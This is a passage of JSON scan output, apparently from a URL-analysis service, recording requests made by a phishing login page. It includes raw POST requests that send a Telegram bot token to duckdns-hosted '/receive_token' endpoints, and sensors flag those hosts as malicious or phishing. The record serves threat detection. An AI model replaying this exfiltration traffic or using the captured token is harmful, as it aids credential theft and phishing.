providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]}],"data":{"size":3282,"size_decoded":0,"mime_type":"image/png","magic":"PNG image data, 159 x 63, 8-bit/color RGBA, non-interlaced","md5":"d898342b4a861502c63f5e4b9db7d2c7","sha1":"c4aeef713d1fadad23084a88a844e29f49b6451b","sha256":"ad450ea6252c2c12b4f9df7ef97661014d1a6d4bbd0663b58a793d071e096ec7","sha512":"34eaac7f91cc030e6d4564aa9c4cd02e3b6c0d003d8f2a50d60ad52c46b8c928181f60f7e2ea5faab3cea06e696cb460fe468b6a85e50220ce639c7dc218c11c","ssdeep":"","tlshash":"38616c95ee4b732f897106739da27ef85da3345dc8170bdd2908272ae0a52032351b03","first_seen":"2023-11-04T01:15:44Z","last_seen":"2026-05-15T00:54:24.326514Z","times_seen":389,"resource_available":false,"data":null}},"time_used":17,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":16,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null}]}},{"url":{"schema":"https","addr":"telegrambotcheck.duckdns.org:5001/receive_token?referrer=loco","fqdn":"telegrambotcheck.duckdns.org","domain":"telegrambotcheck.duckdns.org","tld":"duckdns.org"},"ip":{"addr":"0.0.0.0","port":0,"asn":0,"as":"","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.617Z","timestamp":0,"http_version":"","security_state":"broken","security_info":null,"request":{"raw":"POST /receive_token?referrer=loco HTTP/1.1\r\nHost: telegrambotcheck.duckdns.org:5001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 54\r\nOrigin: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nDNT: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST"},"response":{"raw":"","headers":null,"cookies":null,"status_code":"","status_text":"","fingerprints":null,"data":{"size":0,"size_decoded":0,"mime_type":"","magic":"","md5":"d41d8cd98f00b204e9800998ecf8427e","sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709","sha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sha512":"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e","ssdeep":"","tlshash":"","first_seen":"0001-01-01T00:00:00Z","last_seen":"2026-05-26T05:18:21.639032Z","times_seen":15713447,"resource_available":true,"data":null}},"time_used":1400,"timings":{"blocked":1400,"dns":0,"connect":128,"send":0,"wait":0,"receive":0,"ssl":136},"alerts":{"ids":null,"analyzer":[{"sensor_name":"ultradns","sensor_type":"DNS","title":"DigiCert UltraDNS","description":"DigiCert UltraDNS","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"telegrambotcheck.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://vercara.digicert.com/ultra-dns-public","meta":null},{"sensor_name":"opendns","sensor_type":"DNS","title":"OpenDNS","description":"OpenDNS","scan_date":"2026-02-23","alert":"Phishing Block","trigger":"telegrambotcheck.duckdns.org","verdict":"phishing","severity":"medium","comment":"","link":"https://www.opendns.com/","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"telegrambotcheck.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":[{"sensor_name":"urlquery","alert":"Suspicious - DynDNS domain","verdict":"suspicious","severity":"low","comment":"","tags":["dyndns"],"meta":null}]}},{"url":{"schema":"https","addr":"chacktgbot.duckdns.org:7001/receive_token?referrer=dali","fqdn":"chacktgbot.duckdns.org","domain":"chacktgbot.duckdns.org","tld":"duckdns.org"},"ip":{"addr":"102.165.14.26","port":7001,"asn":397423,"as":"TIER-NET","country":"United States","country_code":"US"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.627Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_256_GCM_SHA384","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"chacktgbot.duckdns.org","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Sat, 20 Dec 2025 20:40:23 GMT","end":"Fri, 20 Mar 2026 20:40:22 GMT"},"fingerprint":{"sha1":"9D:EB:4B:76:0F:39:8F:F3:75:D2:8C:90:48:44:85:6D:E7:7B:51:64","sha256":"41:37:AC:B8:4C:E8:DA:7F:C8:BB:F5:B2:47:39:DA:94:66:5B:D9:97:9B:BF:66:05:D9:48:57:86:71:E6:33:23"}}},"request":{"raw":"POST /receive_token?referrer=dali HTTP/1.1\r\nHost: chacktgbot.duckdns.org:7001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 54\r\nOrigin: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nDNT: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":54,"data":"token=8417606714%3AAAEZkykmM7piN9QxEoBqOGMgHLLy_O_kfhk"}},"response":{"raw":"HTTP/1.0 200 OK\r\nServer: BaseHTTP/0.6 Python/3.12.6\r\nDate: Mon, 23 Feb 2026 12:39:42 GMT\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Python:3.12.6","description":"Python is an interpreted and general-purpose programming language.","website":"https://python.org","common_platform_enumeration":"cpe:2.3:a:python:python:*:*:*:*:*:*:*:*","icon":"Python.png","categories":["Programming languages"]}],"data":{"size":15,"size_decoded":0,"mime_type":"text/plain","magic":"ASCII text, with no line terminators","md5":"4d058b4d6191a51c818c775c63632d34","sha1":"2ad1cbe7d6ba6e2c45edaeed8ba72ef5dbf66276","sha256":"0cc9c76bb51a7aa11bce798dcb3fc548967c3af4cfd0757ebd26f6ab4f06931c","sha512":"ab0cec0ba609549a72504cfc9beaeb1c242c574bd2e9e833114ea8b2c6990b8b1c32502a7d2f0a5968f3d262f88835e6f9af57932f60c88f89cd24950f507ca6","ssdeep":"","tlshash":"44600000c00000c000000f300000c0f30c0000cc000c0c0000000ff00c0000cc03f330","first_seen":"2024-11-27T12:04:51.466746Z","last_seen":"2026-05-24T17:18:10.570556Z","times_seen":248,"resource_available":false,"data":null}},"time_used":953,"timings":{"blocked":409,"dns":140,"connect":129,"send":0,"wait":133,"receive":0,"ssl":138},"alerts":{"ids":null,"analyzer":[{"sensor_name":"ultradns","sensor_type":"DNS","title":"DigiCert UltraDNS","description":"DigiCert UltraDNS","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"chacktgbot.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://vercara.digicert.com/ultra-dns-public","meta":null}],"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null},{"sensor_name":"urlquery","alert":"Suspicious - DynDNS domain","verdict":"suspicious","severity":"low","comment":"","tags":["dyndns"],"meta":null}]}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/favicon.ico","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.832Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /favicon.ico HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 404 Not Found\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: text/html\r\nserver: cloudflare\r\nlast-modified: Fri, 26 Dec 2025 00:35:47 GMT\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncache-control: max-age=14400\r\ncf-cache-status: MISS\r\nvary: accept-encoding\r\npriority: u=6,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=44Mpjk7yG2zKo%2BDIR7FICBnuB8JSlrS%2B6M7Wj8A27e3aJunmh8FX3D5KYfO6GsNfurZyIPIy65xSzYnn0FTfm6%2F9zuLm5yZT7r9s%2Ffc6Jqzq6PUOFoQ8J3yT27in3eCevflMJmG4AnTL0CFMFwCAO12LCh%2FcMnCp83r8xu8%3D\"}]}\r\ncontent-encoding: br\r\ncf-ray: 9d26c9967e71562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"404","status_text":"Not Found","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":808,"size_decoded":0,"mime_type":"text/html","magic":"HTML document, ASCII text","md5":"a943672a32297727bab01c3e76977550","sha1":"3a667c4b7a457ef6c586cc581d533c128737bf53","sha256":"b9347f234dc3c8d56e015e86d88a1400415db8f7a5ad91f02b6a2323c10a4187","sha512":"0965d415f3a0cef31953702fdae345d46fefd72ce3c4c7a0255aede74a76e10b856892700529a444453a622793e0257248c5c99fae17d5b0b9fd4118e208068c","ssdeep":"","tlshash":"2e01bd0a08e0501bc0d3915169a0f22dc9c2f997aa5b180079ed91c6cfd5f89c9d35ac","first_seen":"2023-03-08T11:42:06Z","last_seen":"2026-05-26T02:50:56.680015Z","times_seen":37106,"resource_available":true,"data":null}},"time_used":100,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":100,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":null}}]}